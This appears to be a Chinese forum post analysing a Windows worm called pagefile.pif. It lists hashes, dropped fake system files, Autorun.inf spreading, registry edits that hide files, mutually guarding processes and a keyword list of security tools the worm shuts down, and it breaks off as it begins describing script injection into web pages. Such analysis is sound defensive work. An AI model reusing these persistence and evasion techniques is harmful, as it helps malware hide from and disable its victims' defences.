昨天在別人電腦上抓的““一個pagefile.pif““
 
不記得自己寫過沒有“不過以前遇到過幾次“好像是更新的版本`
 
`過7日的卡吧、瑞星、BD等“
 
這次更新的版本比較惡劣,懷疑是熊貓原碼洩露““ ?
 
…………
 
Aditional Information
File size: 69632 bytes
MD5: 86ae07b7f81a35f268d11fe39a090a50
SHA1: a09329ed3d8b729372f01819b30c3004011e04ee
CRC32     : 84E8D7FA
RIPEMD160: 1C8C3977C66AF86DBC31D38BBD7A0CB4F10096B9
SHA160    : A09329ED3D8B729372F01819B30C3004011E04EE
packers: BINARYRES, FSG
Languages:Microsoft Visual C++ 6.0
 
執行,釋放:
 
%Systemroot%system32Comlsass.exe   69632 位元組   (RHSA)
%Systemroot%system32Comsmss.exe   9261 位元組
每個分割槽(C—F)下的Autorun.inf和pagefile.pif
 
貌似不支援U盤傳播 =.=`(至少沒跟蹤到)
 
修改登錄檔:
 
 
(用了另類方法破壞“顯示隱藏檔案”功能)
 
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden
的ShowSuperHidden值修改為0(原本為1)
 
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden
的Type值寫入亂碼(原為checkbox)
 
假冒系統檔案的lsass.exe 和smss.exe (路徑為%Systemroot%system32Com)“
 
使用雙程式守護技術“`
 
監視對方的存在和自身同黨、登錄檔項等“如被修改或刪除,則重寫““
 
並嘗試關閉下列關鍵字:
 
process
安全衛士    
asm
ida
程式    
卡巴    
瑞星    
毒霸    
防毒    
江民    
softice
virus   
symantec    
avp
regedit
kaka
 
汗“連反彙編工具都不放過““`!
 
後遍歷磁碟,查詢副檔名為jsp php spx asp tml htm的,插入一段程式碼:
 
<script src=”